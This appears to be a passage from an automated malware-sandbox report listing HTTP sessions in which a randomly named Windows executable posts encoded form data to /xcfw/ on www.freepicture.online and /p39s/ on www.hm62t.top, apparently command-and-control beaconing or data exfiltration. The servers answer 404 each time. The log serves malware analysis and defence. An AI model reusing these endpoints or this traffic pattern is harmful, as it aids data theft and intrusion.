                                        Data Ascii: OlTXe=Wh+VGNuLBIYa/Dipxmo7OFd9pqm145VrMrA0ySd03Hc/HmXM21QD14cT4Km0ZL/JGXLtIS2yKD99tDo6V0Zphi/FDd5SftGImiSWFBFh3YpFwRY4T0MW5QxC6hHOT1WK1JoFXbN4jP6DLl4XfXRkeLXu9YxTUnutjaDvnDk6+GuOlsJP1QRC+76kfwXhN/GSz8HO9B+Lkyd0chsGerjpSXErtjUeBQyFeLCO4IOY+744SRJcmljdML8qnSL+zV5uxPHifLQsZFehqpzUKZThTLNCLA4AKUuFE4AN/MTAUUCianp+dK2Icbm98dvCZUM5EO2VQv5KnO2CAH4awI8XKWa9Y3vPmm9q8vz53RwmbdcWhu2HQHeA3nFnEUbKYza9wCYL4Lehwp0FoqIPmi02BTHXTsLIiRFG6g2RCK3MDGCLmdFcAq5YbEh+OqJS+iLqhynsWZOtpfDl1d9bgnpLcO6YyNi3O3sJ7FB+oBU1zsoABFFS7cJNGlGfMi8bQoF4Uf0P2K89wZjcYt5OnQPfujue5GuGKwXDVUHPDkiFnZYVgxs8dSgPayS1Wih6B2H5DtxK7fsD1v7tBPFpp8e93l2rWp7065kie1I4hfKahDPR1dD3Ipld0t/YqpIG3iPO46VYFkSWd8N3G9+ML9Ja2jfQpNkkS5yiH7AU/StSQeUrSaLLgBHWqaJUyPu5G28ThUpy5ugUghutHVwIY6lBPAtunc+mLhXgZf9LkjdRuY6Qt10RjtMm7aM3IrdO1qI4YjSBlVOIPuJ4hmYvLMPNTGuyXuIK4MRnH1Dk3++SMu9pxW6dMaRxmUT3E7Pole5jcgcYXq995AxEnZhFD2dW0L9wmGlDHS+WmuW5pL4uQw6etSAxZqkQeqNfe1Pxqz/qbwfWYoPi2Ck4Lej/JYYU9KEJRpXEMDjesDtfMeJ1KscqvXR4lyoaIQEdcOuYFPz8GSU09IVVGB4+Qpg6XgUL+jbagoHJGhvLVm4BbYrUG82Wcc [TRUNCATED]
                                        Sep 11, 2024 10:09:18.877124071 CEST | 230 | OUT | Data Raw: 35 73 36 6d 4b 6a 6b 38 53 75 4b 59 72 37 58 33 71 51 41 6e 53 51 68 66 73 31 2f 65 66 73 49 75 7a 70 42 74 6f 2b 59 74 4b 4a 6e 69 75 73 42 43 39 73 78 4b 58 62 6e 4f 39 32 41 69 4c 62 78 5a 42 46 48 54 65 52 68 6b 6e 77 37 33 30 6b 62 31 49 62
                                        Data Ascii: 5s6mKjk8SuKYr7X3qQAnSQhfs1/efsIuzpBto+YtKJniusBC9sxKXbnO92AiLbxZBFHTeRhknw730kb1Ib7EympBYtJN55sAttj61vOx5GydjVpIrXjOOXgbpHfysWTVqFVvrA3wFV3VYjDAVbABfbxk7nWU3aqIzh9KBN5qz5ab4Mn/jLQ71+GWCeVc32bfEqTQKngGjHZKhwLLytNFl4HYm4ceFiYu+5UhkZ
                                        Sep 11, 2024 10:09:19.490782976 CEST | 360 | IN | HTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:09:19 GMT
                                        Server: Apache
                                        Content-Length: 196
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        3 | 192.168.2.22 | 49164 | 89.58.49.1 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:09:21.403691053 CEST | 741 | OUT | POST /xcfw/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.freepicture.online
                                        Origin: http://www.freepicture.online
                                        Referer: http://www.freepicture.online/xcfw/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 202
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2f 41 4b 70 77 30 4d 37 4f 6c 64 39 75 71 6d 31 79 5a 56 70 4d 72 46 4a 79 57 45 2f 33 56 38 2f 48 55 66 4d 32 48 49 44 34 59 63 63 73 61 6d 77 58 72 2b 64 47 58 4c 41 49 58 57 79 4b 44 35 39 74 68 51 36 43 47 78 75 71 79 2f 44 46 64 35 54 66 74 4b 42 6d 69 50 54 46 43 31 68 33 61 39 46 69 43 67 34 58 57 55 57 31 41 77 4a 38 68 48 56 54 31 4b 36 31 49 59 37 58 61 78 34 69 2b 6d 44 49 78 30 58 4a 57 52 6b 58 72 58 72 6e 6f 77 2b 5a 45 53 6c 71 4b 54 4e 70 51 59 6b 31 47 71 58 76 74 64 58 36 7a 56 76 39 4a 61 61 63 32 2b 35 48 76 58 65 6f 51 3d 3d
                                        Data Ascii: OlTXe=Wh+VGNuLBIYa/AKpw0M7Old9uqm1yZVpMrFJyWE/3V8/HUfM2HID4YccsamwXr+dGXLAIXWyKD59thQ6CGxuqy/DFd5TftKBmiPTFC1h3a9FiCg4XWUW1AwJ8hHVT1K61IY7Xax4i+mDIx0XJWRkXrXrnow+ZESlqKTNpQYk1GqXvtdX6zVv9Jaac2+5HvXeoQ==
                                        Sep 11, 2024 10:09:22.048521042 CEST | 360 | IN | HTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:09:21 GMT
                                        Server: Apache
                                        Content-Length: 196
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        4 | 192.168.2.22 | 49165 | 89.58.49.1 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:09:23.945384026 CEST | 2472 | OUT | POST /xcfw/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.freepicture.online
                                        Origin: http://www.freepicture.online
                                        Referer: http://www.freepicture.online/xcfw/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 3626
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2b 6a 53 70 39 30 77 37 5a 31 64 36 72 71 6d 31 34 35 56 6c 4d 72 42 4a 79 53 64 30 33 47 51 2f 48 6a 62 4d 32 6c 51 44 30 34 63 63 37 4b 6d 30 5a 4c 2f 47 47 58 76 6d 49 53 71 49 4b 42 31 39 74 43 6f 36 56 79 52 70 69 69 2f 46 42 64 35 4d 66 74 4c 62 6d 69 66 4d 46 43 78 48 33 61 6c 46 69 33 55 34 65 47 55 52 77 41 77 4a 38 68 48 5a 54 31 4b 2f 31 49 51 56 58 65 55 6c 6a 4e 2b 44 49 56 34 58 61 6e 52 6e 52 72 58 6e 71 49 78 64 55 6e 6a 56 6a 61 44 52 6e 44 77 63 2b 47 69 4f 6b 37 4a 50 31 52 52 42 38 72 36 6e 53 51 58 68 53 76 47 4d 7a 38 47 66 39 42 2b 4c 6b 79 68 30 63 78 73 47 65 76 50 71 59 33 45 72 67 44 56 63 43 67 50 30 65 4c 58 74 34 49 65 69 2b 6f 55 34 52 55 6c 63 30 46 6a 64 46 62 38 57 6e 53 4c 4a 35 31 34 39 78 50 66 71 66 50 30 38 5a 46 65 68 71 72 72 55 49 2f 2f 68 56 62 4e 43 48 67 34 42 63 6b 75 47 45 34 30 76 2f 4d 4c 41 55 57 69 69 62 56 42 2b 62 4a 65 4a 49 37 6d 38 34 64 76 63 54 30 4e 6a 45 4f 72 4f 51 76 42 67 6e 4f 6d 43 [TRUNCATED]
                                        Data Ascii: OlTXe=Wh+VGNuLBIYa+jSp90w7Z1d6rqm145VlMrBJySd03GQ/HjbM2lQD04cc7Km0ZL/GGXvmISqIKB19tCo6VyRpii/FBd5MftLbmifMFCxH3alFi3U4eGURwAwJ8hHZT1K/1IQVXeUljN+DIV4XanRnRrXnqIxdUnjVjaDRnDwc+GiOk7JP1RRB8r6nSQXhSvGMz8Gf9B+Lkyh0cxsGevPqY3ErgDVcCgP0eLXt4Iei+oU4RUlc0FjdFb8WnSLJ5149xPfqfP08ZFehqrrUI//hVbNCHg4BckuGE40v/MLAUWiibVB+bJeJI7m84dvcT0NjEOrOQvBgnOmCAFQajdAXW2a8VXvD32xm8vqo3RkQbeIWn/2HZiyD43FlBUb6ODaHwCNs4K+hxcAFmLoPhRcpIDHQFcLfsxF06giZCLniD0aLntFcNvlbGkh7U6IRpyL4hymXWYC9pO7l1elbg1BLcO6bj9iqVng/7F96oBIfzuwABU1S7dJNBFGfUy8YaIFYUfh02PJGwp3cWqJO3iXfmjum7GuHXAWvVU3PDmuznaoVgVA8MDgPWSSLIyhlB2HPDt1G7fcp1sPtBKppv5+9+F2oaJ7wsJkBe2pmhffNhCHR09j3PYld0N/aopIGiyP/46NiFgCsd4Z3GMuMOtJZxjfXrNknDpywH7QU/ShSQaorStfLqQHWiKJWv/uzQG4zhU5I5vlJgm6tGEwIOodeAQtoic+oPhXIZf9fknwauL+QukURvo4n3aMwDLddo6JQYjDklUqYPdd4hnovL5bNU2uyXuIF4MR8H1/w3/PFMu9p3CudMoJxu0TIG7O6he44chp5XpM15BdEnMVFD2dV5b9zrmlAHS6hmuWbpL0uRD2etB4xXvwQYKNfZ1PulT/rbweTYpDI2AA4LuD/F+kV1aFuAZXVVSfFsDgaMet1Kb8q9yl4lCoaCQEeE+vcKv/wGSYe9Kt7G1c+CKI6HXgK1zbbkoHLGhq1VmAJbYzEG/GWc8 [TRUNCATED]
                                        Sep 11, 2024 10:09:23.950862885 CEST | 1694 | OUT | Data Raw: 39 73 36 6d 61 6a 6b 37 75 75 4b 6f 72 34 62 6e 71 64 49 48 53 4f 34 50 73 35 2f 65 66 57 49 71 6d 4d 42 73 41 2b 59 37 4f 4a 77 44 75 73 42 79 38 6e 6b 61 58 49 78 2b 78 61 41 69 58 63 78 5a 77 79 45 6e 43 52 6a 58 66 77 2b 45 63 6b 63 56 49 59
                                        Data Ascii: 9s6majk7uuKor4bnqdIHSO4Ps5/efWIqmMBsA+Y7OJwDusBy8nkaXIx+xaAiXcxZwyEnCRjXfw+EckcVIY2kz5pBURJOBPsEhXjLpvPB5G2fbWtIrRgOOegboqfz4STQaVVtXA3ydVw1YsEwVZMhfBxk/OWUv0qIDh9OZN7OX5fb4M4vjOab1dZGGZVYKpJqEWUHai+FXtY7EIAq7ZGGJqJpegJv0ZB5uzZklspgtJJSg1wATUg
                                        Sep 11, 2024 10:09:24.583694935 CEST | 360 | IN | HTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:09:24 GMT
                                        Server: Apache
                                        Content-Length: 196
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        5 | 192.168.2.22 | 49166 | 89.58.49.1 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:09:26.490036964 CEST | 462 | OUT | GET /xcfw/?th=XXRlJ2&OlTXe=bjW1F6zberoR1D3Y/SomYFBb4KPgrI5pHttayncOl0oweWLXznwXhPhkwae0bsL9Ak/eXSPCLR9UrmkbImBsoCTsC8RlRsuK5QCdMTge/fZa3QU+WBAP1g1G0kur HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.freepicture.online
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:09:27.126241922 CEST | 360 | IN | HTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:09:27 GMT
                                        Server: Apache
                                        Content-Length: 196
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        6 | 192.168.2.22 | 49167 | 154.23.184.240 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:09:49.702229023 CEST | 2472 | OUT | POST /p39s/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.hm62t.top
                                        Origin: http://www.hm62t.top
                                        Referer: http://www.hm62t.top/p39s/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 2162
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 66 77 68 46 37 68 4f 2b 4b 41 6a 59 4d 41 59 6d 59 57 33 52 37 74 67 70 49 50 44 48 63 73 61 35 39 56 67 46 63 65 64 47 49 5a 30 46 51 33 50 47 6b 2f 61 41 41 76 44 50 4b 54 47 49 41 6f 34 33 73 79 76 69 64 73 31 6c 4c 4e 42 30 44 7a 32 48 51 47 39 66 61 58 39 6a 32 66 67 5a 6c 58 79 78 4f 50 63 63 47 4e 48 43 36 69 49 70 52 61 72 4b 6f 56 4c 56 4c 55 57 4a 42 71 64 49 43 76 2b 35 64 70 61 33 56 62 52 61 4c 54 77 68 35 79 64 57 61 73 57 41 2b 69 69 65 70 69 51 38 64 50 62 53 35 76 4c 54 39 57 61 6a 6d 53 41 41 44 53 56 79 43 66 72 4a 70 78 61 73 50 37 2b 66 72 6f 30 4d 68 65 48 64 5a 59 53 37 70 69 76 6c 44 69 6f 41 6d 55 34 50 54 39 4a 63 32 36 6f 31 36 65 49 70 6b 72 67 49 2b 4f 46 66 39 4d 65 64 6a 66 79 64 49 34 73 50 53 30 58 6d 6d 75 6d 76 30 58 4a 53 48 73 54 6e 4e 58 33 52 4e 53 46 79 55 59 73 71 79 47 31 33 55 37 51 35 32 32 48 57 37 72 31 48 6f 6d 71 76 37 35 78 71 48 32 75 33 6c 7a 31 73 6c 2b 75 6d 61 39 41 4c 7a 6f 37 4d 44 66 4b [TRUNCATED]
                                        Data Ascii: OlTXe= [TRUNCATED]
                                        Sep 11, 2024 10:09:49.707585096 CEST | 203 | OUT | Data Raw: 36 4b 75 6f 77 58 61 45 6d 4d 75 6a 69 4a 36 50 39 5a 49 61 62 44 4f 74 37 75 57 57 43 6f 63 7a 4b 6e 75 48 63 45 67 44 75 70 5a 31 58 6f 4a 4b 76 4a 63 61 72 77 56 74 68 64 6d 47 4d 4e 73 59 37 78 63 33 73 56 48 31 43 51 4f 64 39 46 31 38 45 4e
                                        Data Ascii: 6KuowXaEmMujiJ6P9ZIabDOt7uWWCoczKnuHcEgDupZ1XoJKvJcarwVthdmGMNsY7xc3sVH1CQOd9F18ENgkGpbtca+9sq+vrL9Hz6jk6bkzXilYY4WPp/cq9ni8em9HPCW0HffLVjddCNmkwSt20ipMxWlZpzNGWHT2Xu+7kNyaaaSt7scB+MnOQ2po7t58dx7ZOVRusQ9
                                        Sep 11, 2024 10:09:50.583977938 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:09:50 GMT
                                        Content-Type: text/html
                                        Content-Length: 148
                                        Connection: close
                                        ETag: "66a8e223-94"
                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        7 | 192.168.2.22 | 49168 | 154.23.184.240 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:09:52.249310970 CEST | 714 | OUT | POST /p39s/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.hm62t.top
                                        Origin: http://www.hm62t.top
                                        Referer: http://www.hm62t.top/p39s/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 202
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 63 6f 68 45 76 31 4f 2f 71 41 6a 66 4d 41 59 76 34 57 39 52 38 6c 53 70 4a 62 74 48 72 59 61 35 76 64 67 46 76 32 64 48 49 5a 33 4f 77 33 54 4c 45 2f 54 41 41 76 70 50 4c 2f 47 49 41 38 34 30 4f 36 76 71 38 73 30 73 62 4e 44 34 6a 7a 33 48 51 43 65 66 61 54 32 6a 32 33 67 5a 67 66 79 79 50 7a 63 59 56 6c 48 48 4b 69 47 76 52 62 39 4b 6f 5a 61 56 4c 45 4f 4a 43 4f 64 4c 32 76 2b 35 49 56 61 39 69 50 52 55 72 54 74 76 5a 7a 72 56 61 35 52 4d 64 79 6b 51 66 36 72 78 70 2f 63 52 65 37 77 55 4d 7a 53 69 6d 4b 31 5a 58 33 6c 30 6e 33 68 63 41 3d 3d
                                        Data Ascii: OlTXe=4PVtP2BQg8qzhcohEv1O/qAjfMAYv4W9R8lSpJbtHrYa5vdgFv2dHIZ3Ow3TLE/TAAvpPL/GIA840O6vq8s0sbND4jz3HQCefaT2j23gZgfyyPzcYVlHHKiGvRb9KoZaVLEOJCOdL2v+5IVa9iPRUrTtvZzrVa5RMdykQf6rxp/cRe7wUMzSimK1ZX3l0n3hcA==
                                        Sep 11, 2024 10:09:53.155361891 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:09:52 GMT
                                        Content-Type: text/html
                                        Content-Length: 148
                                        Connection: close
                                        ETag: "66a8e223-94"
                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        8 | 192.168.2.22 | 49169 | 154.23.184.240 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:09:54.904728889 CEST | 2472 | OUT | POST /p39s/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.hm62t.top
                                        Origin: http://www.hm62t.top
                                        Referer: http://www.hm62t.top/p39s/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 3626
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 38 34 68 44 4e 64 4f 33 71 41 6b 61 4d 41 59 6d 59 57 35 52 37 74 53 70 49 50 44 48 64 67 61 35 2b 4e 67 47 4d 65 64 55 59 5a 33 47 51 33 50 47 6b 2f 5a 41 44 54 54 50 4b 50 57 49 43 51 34 33 74 79 76 69 61 77 31 6b 4c 4e 42 70 54 7a 34 48 51 43 4c 66 61 69 2b 6a 32 69 46 5a 67 58 79 79 61 6e 63 64 6c 6c 47 49 71 69 47 76 52 61 38 4b 6f 59 2f 56 4c 64 54 4a 41 2f 59 49 46 33 2b 36 74 70 61 78 6c 62 53 53 72 54 70 77 70 79 50 57 61 77 72 41 2b 6a 71 65 74 4b 36 38 64 4c 62 54 76 62 4c 54 36 4b 62 73 57 53 44 65 44 53 56 38 69 66 70 4a 70 78 47 73 50 37 2b 66 72 6b 30 4d 78 65 48 64 62 38 4e 6d 35 69 76 6f 6a 69 66 4e 47 59 73 50 54 6f 59 63 79 2b 34 31 4c 61 49 6f 68 33 67 4e 4f 4f 46 50 4e 4e 62 64 6a 66 46 57 6f 34 61 50 53 74 33 6d 6d 65 51 76 30 58 4a 53 45 30 54 74 2f 50 33 56 64 53 46 77 55 59 74 38 43 47 32 33 56 72 49 35 32 75 48 57 36 7a 31 48 62 2b 71 6d 64 74 77 79 6e 32 6a 7a 6c 7a 33 2f 31 2f 71 6d 61 68 36 4c 7a 68 6d 4d 41 58 4b [TRUNCATED]
                                        Data Ascii: OlTXe= [TRUNCATED]
                                        Sep 11, 2024 10:09:54.910303116 CEST | 1667 | OUT | Data Raw: 36 4b 55 6f 78 37 6a 45 67 4d 75 74 51 78 36 4a 4f 42 49 61 72 44 49 6e 62 76 4d 41 79 6b 77 7a 4b 72 71 48 5a 34 57 44 63 78 5a 37 43 73 4a 41 39 68 63 65 4c 77 55 75 68 64 33 47 4d 42 58 59 37 68 6d 33 6f 4a 39 31 54 63 4f 53 74 46 31 72 57 6c
                                        Data Ascii: 6KUox7jEgMutQx6JOBIarDInbvMAykwzKrqHZ4WDcxZ7CsJA9hceLwUuhd3GMBXY7hm3oJ91TcOStF1rWlngGpdqca39sqavrD5H3r+k+XkzUKlZo4VMZ/Wp9nk8eqEHPLc0HPfLVPdPydm0gSt/UioSBW8XJPOGWm1xDScxTNCZO+JgJoIEIM7PhCPo7Bhz9tDMbRUpbpVH4mi48LgiMOhr2TcTyljv/Eh5UJb4QcWEX71C/YH
                                        Sep 11, 2024 10:09:55.779352903 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:09:55 GMT
                                        Content-Type: text/html
                                        Content-Length: 148
                                        Connection: close
                                        ETag: "66a8e223-94"
